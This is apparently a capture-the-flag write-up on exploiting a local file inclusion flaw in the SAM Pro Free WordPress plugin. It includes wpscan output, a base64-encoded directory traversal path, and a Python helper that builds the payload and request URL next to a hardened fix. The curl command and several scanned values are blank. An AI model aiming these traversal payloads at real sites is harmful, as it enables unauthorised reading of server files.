What the LFI ?

So we are given a website: and we need to read the file /var/www/blah.php. Given the title, we know we need to find an LFI.


This is a WordPress site, so just run wpscan. After a few seconds:

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: sam-pro-free - v1.8.2.51
 |  Last updated: 2017-06-19T15:42:00.000Z
 |  Location:
 |  Readme:
[!] The version is out of date, the latest version is

[!] Title: SAM Pro (Free Edition) <= - Local File Inclusion (LFI)
    Reference: https://wpvulndb.com/vulnerabilities/8647
    Reference: https://www.pluginvulnerabilities.com/2016/10/28/local-file-inclusion-lfi-vulnerability-in-sam-pro-free-edition/
    Reference: https://plugins.trac.wordpress.org/changeset/1526624/sam-pro-free
[i] Fixed in:


Just pull the exploit details from the references above, base64-encode the traversal path (../../../../../../../var/www/blah.php), and:

$ curl ''
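To make the encoding step concrete, here is an added Python helper that is not part of the original writeup. It builds the traversal string used above, base64-encodes it, shows how the value must be percent-encoded when it goes into a query string (base64 contains "/" and "="), and then models the plugin-side pattern that makes this an LFI (decode, join to the plugin directory, include) next to a hardened variant that refuses anything resolving outside the plugin directory. The plugin directory, the query parameter name and the base URL are assumptions for illustration only; the real parameter name is in the referenced advisory, not on this page.

```python
import base64
import os
from urllib.parse import urlencode

# Assumed include directory of the plugin, seven directories below "/".
# This is why seven "../" segments land exactly on /var/www/blah.php.
PLUGIN_DIR = "/var/www/html/wp-content/plugins/sam-pro-free/includes"


def traversal_payload(target, depth=7):
    """Build the relative traversal string and its base64 form.

    depth=7 reproduces ../../../../../../../var/www/blah.php from the text.
    Returns (plain_path, base64_path).
    """
    rel = "../" * depth + target.lstrip("/")
    return rel, base64.b64encode(rel.encode()).decode()


def candidate_payloads(target, max_depth=10):
    """Yield (depth, base64) pairs for depths 1..max_depth.

    In practice the web root depth is unknown, so you probe increasing
    depths until the response changes.
    """
    return [(d, traversal_payload(target, d)[1]) for d in range(1, max_depth + 1)]


def build_request_url(base_url, param, encoded):
    """Attach the encoded path as a query parameter.

    urlencode() percent-encodes "/" and "=" from the base64 alphabet;
    pasting the raw value into a URL would corrupt the decoded path.
    The parameter name is an assumption for this example.
    """
    return f"{base_url}?{urlencode({param: encoded})}"


def vulnerable_include(plugin_dir, encoded):
    """Model of the vulnerable sink: decode, join to the plugin directory,
    include. No containment check, so traversal escapes the directory.
    Returns the absolute path that would be included.
    """
    rel = base64.b64decode(encoded).decode()
    return os.path.normpath(os.path.join(plugin_dir, rel))


def hardened_include(plugin_dir, encoded):
    """Hardened sink: the decoded value must resolve inside plugin_dir.

    Returns the resolved path, or None when the request would leave the
    allowed directory. An allow-list of template names would be stricter
    still; this is the minimal fix for the traversal itself.
    """
    rel = base64.b64decode(encoded).decode()
    base = os.path.normpath(plugin_dir)
    resolved = os.path.normpath(os.path.join(base, rel))
    if os.path.commonpath([base, resolved]) != base:
        return None
    return resolved


if __name__ == "__main__":
    rel, enc = traversal_payload("/var/www/blah.php", depth=7)
    print("plain :", rel)
    print("base64:", enc)
    # Base URL and parameter name are placeholders, not the real plugin's.
    print("url   :", build_request_url("http://target.example/", "file", enc))
    print("vulnerable sink includes:", vulnerable_include(PLUGIN_DIR, enc))
    print("hardened sink includes  :", hardened_include(PLUGIN_DIR, enc))
```

Run it directly to print the payload and the two resolutions side by side; the vulnerable model ends up at /var/www/blah.php while the hardened one rejects the same input.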